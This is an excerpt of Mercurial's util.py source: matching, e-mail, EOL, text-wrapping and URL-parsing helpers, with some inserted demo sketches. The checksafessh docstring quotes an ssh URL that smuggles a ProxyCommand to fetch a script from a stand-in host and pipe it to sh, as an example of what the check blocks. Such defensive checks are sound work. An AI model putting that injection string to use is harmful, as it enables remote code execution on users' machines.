2163 2160 ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
2164 2161 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2165 2162
2166 2163 exact matching (no prefix):
2167 2164 >>> test('abcdefg', 'abc', 'def', 'abcdefg')
2168 2165 ('literal', 'abcdefg', [False, False, True])
2169 2166
2170 2167 regex matching ('re:' prefix)
2171 2168 >>> test('re:a.+b', 'nomatch', 'fooadef', 'fooadefbar')
2172 2169 ('re', 'a.+b', [False, False, True])
2173 2170
2174 2171 force exact matches ('literal:' prefix)
2175 2172 >>> test('literal:re:foobar', 'foobar', 're:foobar')
2176 2173 ('literal', 're:foobar', [False, True])
2177 2174
2178 2175 unknown prefixes are ignored and treated as literals
2179 2176 >>> test('foo:bar', 'foo', 'bar', 'foo:bar')
2180 2177 ('literal', 'foo:bar', [False, False, True])
2181 2178
2182 2179 case insensitive regex matches
2183 2180 >>> itest('re:A.+b', 'nomatch', 'fooadef', 'fooadefBar')
2184 2181 ('re', 'A.+b', [False, False, True])
2185 2182
2186 2183 case insensitive literal matches
2187 2184 >>> itest('ABCDEFG', 'abc', 'def', 'abcdefg')
2188 2185 ('literal', 'ABCDEFG', [False, False, True])
2189 2186 """
2190 2187 if pattern.startswith('re:'):
2191 2188 pattern = pattern[3:]
2192 2189 try:
2193 2190 flags = 0
2194 2191 if not casesensitive:
2195 2192 flags = remod.I
2196 2193 regex = remod.compile(pattern, flags)
2197 2194 except remod.error as e:
2198 2195 raise error.ParseError(_('invalid regular expression: %s')
2199 2196 % e)
2200 2197 return 're', pattern, regex.search
2201 2198 elif pattern.startswith('literal:'):
2202 2199 pattern = pattern[8:]
2203 2200
2204 2201 match = pattern.__eq__
2205 2202
2206 2203 if not casesensitive:
2207 2204 ipat = encoding.lower(pattern)
2208 2205 match = lambda s: ipat == encoding.lower(s)
2209 2206 return 'literal', pattern, match
2210 2207
2211 2208 def shortuser(user):
2212 2209 """Return a short representation of a user name or email address."""
2213 2210 f = user.find('@')
2214 2211 if f >= 0:
2215 2212 user = user[:f]
2216 2213 f = user.find('<')
2217 2214 if f >= 0:
2218 2215 user = user[f + 1:]
2219 2216 f = user.find(' ')
2220 2217 if f >= 0:
2221 2218 user = user[:f]
2222 2219 f = user.find('.')
2223 2220 if f >= 0:
2224 2221 user = user[:f]
2225 2222 return user
2226 2223
2227 2224 def emailuser(user):
2228 2225 """Return the user portion of an email address."""
2229 2226 f = user.find('@')
2230 2227 if f >= 0:
2231 2228 user = user[:f]
2232 2229 f = user.find('<')
2233 2230 if f >= 0:
2234 2231 user = user[f + 1:]
2235 2232 return user
2236 2233
2237 2234 def email(author):
2238 2235 '''get email of author.'''
2239 2236 r = author.find('>')
2240 2237 if r == -1:
2241 2238 r = None
2242 2239 return author[author.find('<') + 1:r]
2243 2240
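# Sketch (not part of the original source): the three author helpers applied
# to one typical "Name <email>" value.
def _demoauthor():
    author = 'Jane Q. Public <jane.public@example.com>'
    assert email(author) == 'jane.public@example.com'
    assert emailuser(author) == 'jane.public'
    assert shortuser(author) == 'jane'
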
2244 2241 def ellipsis(text, maxlength=400):
2245 2242 """Trim string to at most maxlength (default: 400) columns in display."""
2246 2243 return encoding.trim(text, maxlength, ellipsis='...')
2247 2244
2248 2245 def unitcountfn(*unittable):
2249 2246 '''return a function that renders a readable count of some quantity'''
2250 2247
2251 2248 def go(count):
2252 2249 for multiplier, divisor, format in unittable:
2253 2250 if abs(count) >= divisor * multiplier:
2254 2251 return format % (count / float(divisor))
2255 2252 return unittable[-1][2] % count
2256 2253
2257 2254 return go
2258 2255
2259 2256 def processlinerange(fromline, toline):
2260 2257 """Check that linerange <fromline>:<toline> makes sense and return a
2261 2258 0-based range.
2262 2259
2263 2260 >>> processlinerange(10, 20)
2264 2261 (9, 20)
2265 2262 >>> processlinerange(2, 1)
2266 2263 Traceback (most recent call last):
2267 2264 ...
2268 2265 ParseError: line range must be positive
2269 2266 >>> processlinerange(0, 5)
2270 2267 Traceback (most recent call last):
2271 2268 ...
2272 2269 ParseError: fromline must be strictly positive
2273 2270 """
2274 2271 if toline - fromline < 0:
2275 2272 raise error.ParseError(_("line range must be positive"))
2276 2273 if fromline < 1:
2277 2274 raise error.ParseError(_("fromline must be strictly positive"))
2278 2275 return fromline - 1, toline
2279 2276
2280 2277 bytecount = unitcountfn(
2281 2278 (100, 1 << 30, _('%.0f GB')),
2282 2279 (10, 1 << 30, _('%.1f GB')),
2283 2280 (1, 1 << 30, _('%.2f GB')),
2284 2281 (100, 1 << 20, _('%.0f MB')),
2285 2282 (10, 1 << 20, _('%.1f MB')),
2286 2283 (1, 1 << 20, _('%.2f MB')),
2287 2284 (100, 1 << 10, _('%.0f KB')),
2288 2285 (10, 1 << 10, _('%.1f KB')),
2289 2286 (1, 1 << 10, _('%.2f KB')),
2290 2287 (1, 1, _('%.0f bytes')),
2291 2288 )
2292 2289
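# Sketch (not part of the original source, and assuming the default
# untranslated locale): unitcountfn() scans its table top-down and picks the
# first (multiplier, divisor) threshold the value reaches, so the displayed
# precision shrinks as magnitudes grow.
def _demobytecount():
    assert bytecount(2048) == '2.00 KB'            # 1 KB <= n < 10 KB
    assert bytecount(150 * (1 << 20)) == '150 MB'  # >= 100 MB: no decimals
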
2293 2290 # Matches a single EOL, which can be either an LF or a CRLF (where any
2294 2291 # run of preceding CRs is removed). We do not care about old Macintosh
2295 2292 # files, so a stray CR is an error.
2296 2293 _eolre = remod.compile(br'\r*\n')
2297 2294
2298 2295 def tolf(s):
2299 2296 return _eolre.sub('\n', s)
2300 2297
2301 2298 def tocrlf(s):
2302 2299 return _eolre.sub('\r\n', s)
2303 2300
2304 2301 if pycompat.oslinesep == '\r\n':
2305 2302 tonativeeol = tocrlf
2306 2303 fromnativeeol = tolf
2307 2304 else:
2308 2305 tonativeeol = pycompat.identity
2309 2306 fromnativeeol = pycompat.identity
2310 2307
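# Sketch (not part of the original source): runs of CRs before an LF collapse
# into a single target EOL, and native round-trips are lossless.
def _demoeol():
    assert tolf('a\r\r\nb\n') == 'a\nb\n'
    assert tocrlf('a\nb\n') == 'a\r\nb\r\n'
    assert fromnativeeol(tonativeeol('a\nb\n')) == 'a\nb\n'
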
2311 2308 def escapestr(s):
2312 2309 # call underlying function of s.encode('string_escape') directly for
2313 2310 # Python 3 compatibility
2314 2311 return codecs.escape_encode(s)[0]
2315 2312
2316 2313 def unescapestr(s):
2317 2314 return codecs.escape_decode(s)[0]
2318 2315
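# Sketch (not part of the original source): escapestr()/unescapestr() are the
# codec-level equivalent of Python 2's s.encode/decode('string_escape').
def _demoescapestr():
    assert escapestr('a\nb\x00') == 'a\\nb\\x00'
    assert unescapestr('a\\nb\\x00') == 'a\nb\x00'
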
2319 2316 def forcebytestr(obj):
2320 2317 """Portably format an arbitrary object (e.g. exception) into a byte
2321 2318 string."""
2322 2319 try:
2323 2320 return pycompat.bytestr(obj)
2324 2321 except UnicodeEncodeError:
2325 2322 # non-ascii string, may be lossy
2326 2323 return pycompat.bytestr(encoding.strtolocal(str(obj)))
2327 2324
2328 2325 def uirepr(s):
2329 2326 # Avoid double backslash in Windows path repr()
2330 2327 return repr(s).replace('\\\\', '\\')
2331 2328
2332 2329 # delay import of textwrap
2333 2330 def MBTextWrapper(**kwargs):
2334 2331 class tw(textwrap.TextWrapper):
2335 2332 """
2336 2333 Extend TextWrapper for width-awareness.
2337 2334
2338 2335 Neither the number of 'bytes' in any encoding nor the number of
2339 2336 'characters' is appropriate to calculate terminal columns of a string.
2340 2337
2341 2338 The original TextWrapper implementation uses the built-in 'len()'
2342 2339 directly, so overriding is needed to use each character's width.
2343 2340
2344 2341 In addition, characters classified as 'ambiguous' width are
2345 2342 treated as wide in East Asian locales, but as narrow elsewhere.
2346 2343
2347 2344 This requires a user decision to determine the width of such characters.
2348 2345 """
2349 2346 def _cutdown(self, ucstr, space_left):
2350 2347 l = 0
2351 2348 colwidth = encoding.ucolwidth
2352 2349 for i in xrange(len(ucstr)):
2353 2350 l += colwidth(ucstr[i])
2354 2351 if space_left < l:
2355 2352 return (ucstr[:i], ucstr[i:])
2356 2353 return ucstr, ''
2357 2354
2358 2355 # overriding of base class
2359 2356 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2360 2357 space_left = max(width - cur_len, 1)
2361 2358
2362 2359 if self.break_long_words:
2363 2360 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2364 2361 cur_line.append(cut)
2365 2362 reversed_chunks[-1] = res
2366 2363 elif not cur_line:
2367 2364 cur_line.append(reversed_chunks.pop())
2368 2365
2369 2366 # this overriding code is imported from TextWrapper of Python 2.6
2370 2367 # to calculate columns of string by 'encoding.ucolwidth()'
2371 2368 def _wrap_chunks(self, chunks):
2372 2369 colwidth = encoding.ucolwidth
2373 2370
2374 2371 lines = []
2375 2372 if self.width <= 0:
2376 2373 raise ValueError("invalid width %r (must be > 0)" % self.width)
2377 2374
2378 2375 # Arrange in reverse order so items can be efficiently popped
2379 2376 # from a stack of chunks.
2380 2377 chunks.reverse()
2381 2378
2382 2379 while chunks:
2383 2380
2384 2381 # Start the list of chunks that will make up the current line.
2385 2382 # cur_len is just the length of all the chunks in cur_line.
2386 2383 cur_line = []
2387 2384 cur_len = 0
2388 2385
2389 2386 # Figure out which static string will prefix this line.
2390 2387 if lines:
2391 2388 indent = self.subsequent_indent
2392 2389 else:
2393 2390 indent = self.initial_indent
2394 2391
2395 2392 # Maximum width for this line.
2396 2393 width = self.width - len(indent)
2397 2394
2398 2395 # First chunk on line is whitespace -- drop it, unless this
2399 2396 # is the very beginning of the text (i.e. no lines started yet).
2400 2397 if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
2401 2398 del chunks[-1]
2402 2399
2403 2400 while chunks:
2404 2401 l = colwidth(chunks[-1])
2405 2402
2406 2403 # Can at least squeeze this chunk onto the current line.
2407 2404 if cur_len + l <= width:
2408 2405 cur_line.append(chunks.pop())
2409 2406 cur_len += l
2410 2407
2411 2408 # Nope, this line is full.
2412 2409 else:
2413 2410 break
2414 2411
2415 2412 # The current line is full, and the next chunk is too big to
2416 2413 # fit on *any* line (not just this one).
2417 2414 if chunks and colwidth(chunks[-1]) > width:
2418 2415 self._handle_long_word(chunks, cur_line, cur_len, width)
2419 2416
2420 2417 # If the last chunk on this line is all whitespace, drop it.
2421 2418 if (self.drop_whitespace and
2422 2419 cur_line and cur_line[-1].strip() == r''):
2423 2420 del cur_line[-1]
2424 2421
2425 2422 # Convert current line back to a string and store it in list
2426 2423 # of all lines (return value).
2427 2424 if cur_line:
2428 2425 lines.append(indent + r''.join(cur_line))
2429 2426
2430 2427 return lines
2431 2428
2432 2429 global MBTextWrapper
2433 2430 MBTextWrapper = tw
2434 2431 return tw(**kwargs)
2435 2432
2436 2433 def wrap(line, width, initindent='', hangindent=''):
2437 2434 maxindent = max(len(hangindent), len(initindent))
2438 2435 if width <= maxindent:
2439 2436 # adjust for weird terminal size
2440 2437 width = max(78, maxindent + 1)
2441 2438 line = line.decode(pycompat.sysstr(encoding.encoding),
2442 2439 pycompat.sysstr(encoding.encodingmode))
2443 2440 initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
2444 2441 pycompat.sysstr(encoding.encodingmode))
2445 2442 hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
2446 2443 pycompat.sysstr(encoding.encodingmode))
2447 2444 wrapper = MBTextWrapper(width=width,
2448 2445 initial_indent=initindent,
2449 2446 subsequent_indent=hangindent)
2450 2447 return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2451 2448
2452 2449 if (pyplatform.python_implementation() == 'CPython' and
2453 2450 sys.version_info < (3, 0)):
2454 2451 # There is an issue in CPython that some IO methods do not handle EINTR
2455 2452 # correctly. The following table shows what CPython version (and functions)
2456 2453 # are affected (buggy: has the EINTR bug, okay: otherwise):
2457 2454 #
2458 2455 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2459 2456 # --------------------------------------------------
2460 2457 # fp.__iter__ | buggy | buggy | okay
2461 2458 # fp.read* | buggy | okay [1] | okay
2462 2459 #
2463 2460 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2464 2461 #
2465 2462 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2466 2463 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2467 2464 #
2468 2465 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2469 2466 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2470 2467 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2471 2468 # fp.__iter__ but not other fp.read* methods.
2472 2469 #
2473 2470 # On modern systems like Linux, the "read" syscall cannot be interrupted
2474 2471 # when reading "fast" files like on-disk files. So the EINTR issue only
2475 2472 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2476 2473 # files approximately as "fast" files and use the fast (unsafe) code path,
2477 2474 # to minimize the performance impact.
2478 2475 if sys.version_info >= (2, 7, 4):
2479 2476 # fp.readline deals with EINTR correctly, use it as a workaround.
2480 2477 def _safeiterfile(fp):
2481 2478 return iter(fp.readline, '')
2482 2479 else:
2483 2480 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2484 2481 # note: this may block longer than necessary because of bufsize.
2485 2482 def _safeiterfile(fp, bufsize=4096):
2486 2483 fd = fp.fileno()
2487 2484 line = ''
2488 2485 while True:
2489 2486 try:
2490 2487 buf = os.read(fd, bufsize)
2491 2488 except OSError as ex:
2492 2489 # os.read only raises EINTR before any data is read
2493 2490 if ex.errno == errno.EINTR:
2494 2491 continue
2495 2492 else:
2496 2493 raise
2497 2494 line += buf
2498 2495 if '\n' in buf:
2499 2496 splitted = line.splitlines(True)
2500 2497 line = ''
2501 2498 for l in splitted:
2502 2499 if l[-1] == '\n':
2503 2500 yield l
2504 2501 else:
2505 2502 line = l
2506 2503 if not buf:
2507 2504 break
2508 2505 if line:
2509 2506 yield line
2510 2507
2511 2508 def iterfile(fp):
2512 2509 fastpath = True
2513 2510 if type(fp) is file:
2514 2511 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2515 2512 if fastpath:
2516 2513 return fp
2517 2514 else:
2518 2515 return _safeiterfile(fp)
2519 2516 else:
2520 2517 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2521 2518 def iterfile(fp):
2522 2519 return fp
2523 2520
2524 2521 def iterlines(iterator):
2525 2522 for chunk in iterator:
2526 2523 for line in chunk.splitlines():
2527 2524 yield line
2528 2525
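# Sketch (not part of the original source): reading through iterfile() keeps
# line iteration EINTR-safe on the affected CPython 2 versions while staying
# on the fast path for regular files; iterlines() flattens chunked payloads.
def _demoiterate(fp, chunks):
    for line in iterfile(fp):        # fp is any readable file object
        pass                         # consume lines safely
    return list(iterlines(chunks))   # e.g. ['a', 'b'] for ['a\nb']
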
2529 2526 def expandpath(path):
2530 2527 return os.path.expanduser(os.path.expandvars(path))
2531 2528
2532 2529 def hgcmd():
2533 2530 """Return the command used to execute current hg
2534 2531
2535 2532 This is different from hgexecutable() because on Windows we want
2536 2533 to avoid things opening new shell windows like batch files, so we
2537 2534 get either the python call or current executable.
2538 2535 """
2539 2536 if mainfrozen():
2540 2537 if getattr(sys, 'frozen', None) == 'macosx_app':
2541 2538 # Env variable set by py2app
2542 2539 return [encoding.environ['EXECUTABLEPATH']]
2543 2540 else:
2544 2541 return [pycompat.sysexecutable]
2545 2542 return gethgcmd()
2546 2543
2547 2544 def rundetached(args, condfn):
2548 2545 """Execute the argument list in a detached process.
2549 2546
2550 2547 condfn is a callable which is called repeatedly and should return
2551 2548 True once the child process is known to have started successfully.
2552 2549 At this point, the child process PID is returned. If the child
2553 2550 process fails to start or finishes before condfn() evaluates to
2554 2551 True, return -1.
2555 2552 """
2556 2553 # Windows case is easier because the child process is either
2557 2554 # successfully starting and validating the condition or exiting
2558 2555 # on failure. We just poll on its PID. On Unix, if the child
2559 2556 # process fails to start, it will be left in a zombie state until
2560 2557 # the parent wait on it, which we cannot do since we expect a long
2561 2558 # running process on success. Instead we listen for SIGCHLD telling
2562 2559 # us our child process terminated.
2563 2560 terminated = set()
2564 2561 def handler(signum, frame):
2565 2562 terminated.add(os.wait())
2566 2563 prevhandler = None
2567 2564 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2568 2565 if SIGCHLD is not None:
2569 2566 prevhandler = signal.signal(SIGCHLD, handler)
2570 2567 try:
2571 2568 pid = spawndetached(args)
2572 2569 while not condfn():
2573 2570 if ((pid in terminated or not testpid(pid))
2574 2571 and not condfn()):
2575 2572 return -1
2576 2573 time.sleep(0.1)
2577 2574 return pid
2578 2575 finally:
2579 2576 if prevhandler is not None:
2580 2577 signal.signal(signal.SIGCHLD, prevhandler)
2581 2578
2582 2579 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2583 2580 """Return the result of interpolating items in the mapping into string s.
2584 2581
2585 2582 prefix is a single character string, or a two character string with
2586 2583 a backslash as the first character if the prefix needs to be escaped in
2587 2584 a regular expression.
2588 2585
2589 2586 fn is an optional function that will be applied to the replacement text
2590 2587 just before replacement.
2591 2588
2592 2589 escape_prefix is an optional flag that allows a doubled prefix to be
2593 2590 used to escape the prefix itself.
2594 2591 """
2595 2592 fn = fn or (lambda s: s)
2596 2593 patterns = '|'.join(mapping.keys())
2597 2594 if escape_prefix:
2598 2595 patterns += '|' + prefix
2599 2596 if len(prefix) > 1:
2600 2597 prefix_char = prefix[1:]
2601 2598 else:
2602 2599 prefix_char = prefix
2603 2600 mapping[prefix_char] = prefix_char
2604 2601 r = remod.compile(r'%s(%s)' % (prefix, patterns))
2605 2602 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2606 2603
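# Sketch (not part of the original source): plain prefix, no escaping. Note
# that mapping keys are joined into a regexp alternation, so they should be
# regexp-safe.
def _demointerpolate():
    assert interpolate('%', {'who': 'world'}, 'hello %who') == 'hello world'
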
2607 2604 def getport(port):
2608 2605 """Return the port for a given network service.
2609 2606
2610 2607 If port is an integer, it's returned as is. If it's a string, it's
2611 2608 looked up using socket.getservbyname(). If there's no matching
2612 2609 service, error.Abort is raised.
2613 2610 """
2614 2611 try:
2615 2612 return int(port)
2616 2613 except ValueError:
2617 2614 pass
2618 2615
2619 2616 try:
2620 2617 return socket.getservbyname(port)
2621 2618 except socket.error:
2622 2619 raise Abort(_("no port number associated with service '%s'") % port)
2623 2620
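# Sketch (not part of the original source): numeric strings pass straight
# through; anything else goes to the system services database, so the second
# assertion assumes a conventional /etc/services.
def _demogetport():
    assert getport('8080') == 8080
    assert getport('http') == 80  # assumption: 'http' is a known service
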
2624 2621 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
2625 2622 '0': False, 'no': False, 'false': False, 'off': False,
2626 2623 'never': False}
2627 2624
2628 2625 def parsebool(s):
2629 2626 """Parse s into a boolean.
2630 2627
2631 2628 If s is not a valid boolean, returns None.
2632 2629 """
2633 2630 return _booleans.get(s.lower(), None)
2634 2631
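# Sketch (not part of the original source): lookup is case-insensitive, and
# unknown spellings map to None rather than raising.
def _demoparsebool():
    assert parsebool('Yes') is True
    assert parsebool('off') is False
    assert parsebool('2') is None
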
2635 2632 _hextochr = dict((a + b, chr(int(a + b, 16)))
2636 2633 for a in string.hexdigits for b in string.hexdigits)
2637 2634
2638 2635 class url(object):
2639 2636 r"""Reliable URL parser.
2640 2637
2641 2638 This parses URLs and provides attributes for the following
2642 2639 components:
2643 2640
2644 2641 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2645 2642
2646 2643 Missing components are set to None. The only exception is
2647 2644 fragment, which is set to '' if present but empty.
2648 2645
2649 2646 If parsefragment is False, fragment is included in query. If
2650 2647 parsequery is False, query is included in path. If both are
2651 2648 False, both fragment and query are included in path.
2652 2649
2653 2650 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2654 2651
2655 2652 Note that for backward compatibility reasons, bundle URLs do not
2656 2653 take host names. That means 'bundle://../' has a path of '../'.
2657 2654
2658 2655 Examples:
2659 2656
2660 2657 >>> url('http://www.ietf.org/rfc/rfc2396.txt')
2661 2658 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2662 2659 >>> url('ssh://[::1]:2200//home/joe/repo')
2663 2660 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2664 2661 >>> url('file:///home/joe/repo')
2665 2662 <url scheme: 'file', path: '/home/joe/repo'>
2666 2663 >>> url('file:///c:/temp/foo/')
2667 2664 <url scheme: 'file', path: 'c:/temp/foo/'>
2668 2665 >>> url('bundle:foo')
2669 2666 <url scheme: 'bundle', path: 'foo'>
2670 2667 >>> url('bundle://../foo')
2671 2668 <url scheme: 'bundle', path: '../foo'>
2672 2669 >>> url(r'c:\foo\bar')
2673 2670 <url path: 'c:\\foo\\bar'>
2674 2671 >>> url(r'\\blah\blah\blah')
2675 2672 <url path: '\\\\blah\\blah\\blah'>
2676 2673 >>> url(r'\\blah\blah\blah#baz')
2677 2674 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2678 2675 >>> url(r'file:///C:\users\me')
2679 2676 <url scheme: 'file', path: 'C:\\users\\me'>
2680 2677
2681 2678 Authentication credentials:
2682 2679
2683 2680 >>> url('ssh://joe:xyz@x/repo')
2684 2681 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2685 2682 >>> url('ssh://joe@x/repo')
2686 2683 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2687 2684
2688 2685 Query strings and fragments:
2689 2686
2690 2687 >>> url('http://host/a?b#c')
2691 2688 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2692 2689 >>> url('http://host/a?b#c', parsequery=False, parsefragment=False)
2693 2690 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2694 2691
2695 2692 Empty path:
2696 2693
2697 2694 >>> url('')
2698 2695 <url path: ''>
2699 2696 >>> url('#a')
2700 2697 <url path: '', fragment: 'a'>
2701 2698 >>> url('http://host/')
2702 2699 <url scheme: 'http', host: 'host', path: ''>
2703 2700 >>> url('http://host/#a')
2704 2701 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2705 2702
2706 2703 Only scheme:
2707 2704
2708 2705 >>> url('http:')
2709 2706 <url scheme: 'http'>
2710 2707 """
2711 2708
2712 2709 _safechars = "!~*'()+"
2713 2710 _safepchars = "/!~*'()+:\\"
2714 2711 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2715 2712
2716 2713 def __init__(self, path, parsequery=True, parsefragment=True):
2717 2714 # We slowly chomp away at path until we have only the path left
2718 2715 self.scheme = self.user = self.passwd = self.host = None
2719 2716 self.port = self.path = self.query = self.fragment = None
2720 2717 self._localpath = True
2721 2718 self._hostport = ''
2722 2719 self._origpath = path
2723 2720
2724 2721 if parsefragment and '#' in path:
2725 2722 path, self.fragment = path.split('#', 1)
2726 2723
2727 2724 # special case for Windows drive letters and UNC paths
2728 2725 if hasdriveletter(path) or path.startswith('\\\\'):
2729 2726 self.path = path
2730 2727 return
2731 2728
2732 2729 # For compatibility reasons, we can't handle bundle paths as
2733 2730 # normal URLs
        if path.startswith('bundle:'):
            self.scheme = 'bundle'
            path = path[7:]
            if path.startswith('//'):
                path = path[2:]
            self.path = path
            return

        if self._matchscheme(path):
            parts = path.split(':', 1)
            if parts[0]:
                self.scheme, path = parts
                self._localpath = False

        if not path:
            path = None
            if self._localpath:
                self.path = ''
                return
        else:
            if self._localpath:
                self.path = path
                return

            if parsequery and '?' in path:
                path, self.query = path.split('?', 1)
                if not path:
                    path = None
                if not self.query:
                    self.query = None

            # // is required to specify a host/authority
            if path and path.startswith('//'):
                parts = path[2:].split('/', 1)
                if len(parts) > 1:
                    self.host, path = parts
                else:
                    self.host = parts[0]
                    path = None
                if not self.host:
                    self.host = None
                    # path of file:///d is /d
                    # path of file:///d:/ is d:/, not /d:/
                    if path and not hasdriveletter(path):
                        path = '/' + path

            if self.host and '@' in self.host:
                self.user, self.host = self.host.rsplit('@', 1)
                if ':' in self.user:
                    self.user, self.passwd = self.user.split(':', 1)
                if not self.host:
                    self.host = None

            # Don't split on colons in IPv6 addresses without ports
            if (self.host and ':' in self.host and
                not (self.host.startswith('[') and self.host.endswith(']'))):
                self._hostport = self.host
                self.host, self.port = self.host.rsplit(':', 1)
                if not self.host:
                    self.host = None

            if (self.host and self.scheme == 'file' and
                self.host not in ('localhost', '127.0.0.1', '[::1]')):
                raise Abort(_('file:// URLs can only refer to localhost'))

        self.path = path

        # leave the query string escaped
        for a in ('user', 'passwd', 'host', 'port',
                  'path', 'fragment'):
            v = getattr(self, a)
            if v is not None:
                setattr(self, a, urlreq.unquote(v))

    def __repr__(self):
        attrs = []
        for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
                  'query', 'fragment'):
            v = getattr(self, a)
            if v is not None:
                attrs.append('%s: %r' % (a, v))
        return '<url %s>' % ', '.join(attrs)

    def __bytes__(self):
        r"""Join the URL's components back into a URL string.

        Examples:

        >>> str(url('http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
        'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
        >>> str(url('http://user:pw@host:80/?foo=bar&baz=42'))
        'http://user:pw@host:80/?foo=bar&baz=42'
        >>> str(url('http://user:pw@host:80/?foo=bar%3dbaz'))
        'http://user:pw@host:80/?foo=bar%3dbaz'
        >>> str(url('ssh://user:pw@[::1]:2200//home/joe#'))
        'ssh://user:pw@[::1]:2200//home/joe#'
        >>> str(url('http://localhost:80//'))
        'http://localhost:80//'
        >>> str(url('http://localhost:80/'))
        'http://localhost:80/'
        >>> str(url('http://localhost:80'))
        'http://localhost:80/'
        >>> str(url('bundle:foo'))
        'bundle:foo'
        >>> str(url('bundle://../foo'))
        'bundle:../foo'
        >>> str(url('path'))
        'path'
        >>> str(url('file:///tmp/foo/bar'))
        'file:///tmp/foo/bar'
        >>> str(url('file:///c:/tmp/foo/bar'))
        'file:///c:/tmp/foo/bar'
        >>> print(url(r'bundle:foo\bar'))
        bundle:foo\bar
        >>> print(url(r'file:///D:\data\hg'))
        file:///D:\data\hg
        """
        if self._localpath:
            s = self.path
            if self.scheme == 'bundle':
                s = 'bundle:' + s
            if self.fragment:
                s += '#' + self.fragment
            return s

        s = self.scheme + ':'
        if self.user or self.passwd or self.host:
            s += '//'
        elif self.scheme and (not self.path or self.path.startswith('/')
                              or hasdriveletter(self.path)):
            s += '//'
            if hasdriveletter(self.path):
                s += '/'
        if self.user:
            s += urlreq.quote(self.user, safe=self._safechars)
        if self.passwd:
            s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
        if self.user or self.passwd:
            s += '@'
        if self.host:
            if not (self.host.startswith('[') and self.host.endswith(']')):
                s += urlreq.quote(self.host)
            else:
                s += self.host
        if self.port:
            s += ':' + urlreq.quote(self.port)
        if self.host:
            s += '/'
        if self.path:
            # TODO: similar to the query string, we should not unescape the
            # path when we store it, the path might contain '%2f' = '/',
            # which we should *not* escape.
            s += urlreq.quote(self.path, safe=self._safepchars)
        if self.query:
            # we store the query in escaped form.
            s += '?' + self.query
        if self.fragment is not None:
            s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
        return s

    __str__ = encoding.strmethod(__bytes__)

    def authinfo(self):
        user, passwd = self.user, self.passwd
        try:
            self.user, self.passwd = None, None
            s = bytes(self)
        finally:
            self.user, self.passwd = user, passwd
        if not self.user:
            return (s, None)
        # authinfo[1] is passed to urllib2 password manager, and its
        # URIs must not contain credentials. The host is passed in the
        # URIs list because Python < 2.4.3 uses only that to search for
        # a password.
        return (s, (None, (s, self.host),
                    self.user, self.passwd or ''))

    def isabs(self):
        if self.scheme and self.scheme != 'file':
            return True # remote URL
        if hasdriveletter(self.path):
            return True # absolute for our purposes - can't be joined()
        if self.path.startswith(br'\\'):
            return True # Windows UNC path
        if self.path.startswith('/'):
            return True # POSIX-style
        return False

    def localpath(self):
        if self.scheme == 'file' or self.scheme == 'bundle':
            path = self.path or '/'
            # For Windows, we need to promote hosts containing drive
            # letters to paths with drive letters.
            if hasdriveletter(self._hostport):
                path = self._hostport + '/' + self.path
            elif (self.host is not None and self.path
                  and not hasdriveletter(path)):
                path = '/' + path
            return path
        return self._origpath

    def islocal(self):
        '''whether localpath will return something that posixfile can open'''
        return (not self.scheme or self.scheme == 'file'
                or self.scheme == 'bundle')

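# Editor's note: an illustrative sketch, not part of the original module.
# It shows how the url class round-trips a URL and how authinfo() strips
# credentials before the URL is handed to the urllib2 password manager.
# The _demo* name is hypothetical and is never called by Mercurial.
def _demourlauthinfo():
    u = url('http://joe:secret@example.com/repo')
    # bytes(u) re-joins the components, credentials included.
    assert bytes(u) == 'http://joe:secret@example.com/repo'
    # authinfo() returns the URL without credentials plus the auth tuple.
    stripped, auth = u.authinfo()
    assert stripped == 'http://example.com/repo'
    assert auth == (None, (stripped, 'example.com'), 'joe', 'secret')
    return stripped, auth
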
def hasscheme(path):
    return bool(url(path).scheme)

def hasdriveletter(path):
    return path and path[1:2] == ':' and path[0:1].isalpha()

def urllocalpath(path):
    return url(path, parsequery=False, parsefragment=False).localpath()

def checksafessh(path):
    """check if a path / url is a potentially unsafe ssh exploit (SEC)

    This is a sanity check for ssh urls. ssh will parse the first item as
    an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
    Let's prevent these potentially exploitable urls entirely and warn the
    user.

    Raises an error.Abort when the url is unsafe.
    """
    path = urlreq.unquote(path)
    if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
        raise error.Abort(_('potentially unsafe url: %r') %
                          (path,))
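
# Editor's note: an illustrative sketch, not part of the original module.
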